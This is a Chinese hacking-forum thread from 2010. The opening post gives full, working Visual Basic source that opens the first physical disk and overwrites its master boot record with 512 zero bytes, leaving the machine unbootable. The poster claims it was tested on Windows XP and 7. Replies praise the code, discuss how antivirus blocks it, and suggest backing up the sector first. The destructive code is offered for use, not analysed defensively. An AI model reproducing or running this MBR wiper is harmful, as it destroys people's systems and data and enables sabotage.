[原创]纯VB在NT系统下破坏MBR
以下代码在Windows XP和Windows 7 x86/x64上测试成功,原理是磁盘直接写入。Option Explicit
Private Declare Function CreateFile Lib "kernel32.dll" Alias "CreateFileA" (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, ByVal lpSecurityAttributes As Long, ByVal dwCreationDisposition As Long, ByVal dwFlagsAndAttributes As Long, ByVal hTemplateFile As Long) As Long
Private Declare Function SetFilePointer Lib "kernel32.dll" (ByVal hFile As Long, ByVal lDistanceToMove As Long, lpDistanceToMoveHigh As Long, ByVal dwMoveMethod As Long) As Long
Private Declare Sub RtlZeroMemory Lib "kernel32.dll" (ByVal pDestination As Long, ByVal Length As Long)
Private Declare Function ReadFile Lib "kernel32.dll" (ByVal hFile As Long, ByVal lpBuffer As Long, ByVal nNumberOfBytesToRead As Long, lpNumberOfBytesRead As Long, ByVal lpOverlapped As Long) As Long
Private Declare Function WriteFile Lib "kernel32.dll" (ByVal hFile As Long, ByVal lpBuffer As Long, ByVal nNumberOfBytesToWrite As Long, lpNumberOfBytesWritten As Long, ByVal lpOverlapped As Long) As Long
Private Declare Function CloseHandle Lib "kernel32.dll" (ByVal hObject As Long) As Long
Private Const GENERIC_READ As Long = &H80000000
Private Const GENERIC_WRITE As Long = &H40000000
Private Const FILE_SHARE_READ As Long = &H1
Private Const FILE_SHARE_WRITE As Long = &H2
Private Const OPEN_EXISTING As Long = 3
Private Const INVALID_HANDLE_VALUE As Long = (-1)
Private Const FILE_BEGIN As Long = 0
Public Function main()
Dim hFile As Long
Dim buffer(511) As Byte
Dim dwReadWrite As Long
hFile = CreateFile("\\.\PhysicalDrive0", GENERIC_READ Or GENERIC_WRITE, FILE_SHARE_READ Or FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0)
If (hFile <> INVALID_HANDLE_VALUE) Then
Call SetFilePointer(hFile, 0, 0, FILE_BEGIN)
Call ReadFile(hFile, VarPtr(buffer(0)), 512, dwReadWrite, 0)
Call SetFilePointer(hFile, 0, 0, FILE_BEGIN)
Call RtlZeroMemory(VarPtr(buffer(0)), 512)
Call WriteFile(hFile, VarPtr(buffer(0)), 512, dwReadWrite, 0)
Call CloseHandle(hFile)
End If
End Function
另附一份关于修改MBR的资料,可以拿去参考一下。 无理由支持 篡改MBR的代码是在Ring 3的,我用VB实现了。 绝对膜拜。!!!
传说中的鬼影吗!??!!
可以从MBR启动!? 本帖最后由 oopww 于 2010-7-25 18:46 编辑
汇编的代码早有了···叫什么红眼睛
只是没你说的R3的啊!!!! 汇编的代码早有了···叫什么红眼睛
只是没你说的R3的啊!!!!
oopww 发表于 2010-7-25 18:42 http://www.m5home.com/bbs/images/common/back.gif
CreateFileA+WriteFile 至于这份代码的后果是什么,我就不说了,实践出真知嘛,自己在真机上测试一下就行了。
PS:真的在真机上测试人的绝对是SB。 再次膜拜TA神牛
本网站最菜的人 发表于 2010-7-25 21:32 http://www.m5home.com/bbs/images/common/back.gif
不要老是说这些虚伪的话。。。 用不着测试了
看见"RtlZeroMemory"就知道会怎么样了
真是邪恶啊....... 其实只要把WriteFile的Call注释掉就不会有这种后果了 用不着测试了
看见"RtlZeroMemory"就知道会怎么样了
真是邪恶啊.......
xiaoly99 发表于 2010-7-26 19:51 http://www.m5home.com/bbs/images/common/back.gif
RtlZeroMemory只是清空本进程中buffer数组的值,这一步还没有破坏MBR。。。 其实只要把WriteFile的Call注释掉就不会有这种后果了
xiaoly99 发表于 2010-7-26 19:52 http://www.m5home.com/bbs/images/common/back.gif
废话。。。 这个方法不一定可以成功。。。比如装了某些杀毒软件后,或者装了什么还原软件之类的。。。通常都会保护0扇区的 回复 19# 364589886
废话。。。当然只能在无杀软的情况下。。。
随便一个ssdt hook就能禁止Ring 3写MBR了。 请问楼主~
那能破坏~
能否修复呢? 回复 opboy45 的帖子
在破坏之前先备份就行了。。。
反正不就是写512个字节么。。。 回复 Tesla.Angela 的帖子
也对哦~
呵呵~
感谢楼主了~ 多谢分享 以前有搜索mbr木马的东西,当时在虚拟机运行测试了。反正每次都开启都提示一句英文就放在那里了。不知道现在还能搜到吗。 学习一下
页:
[1]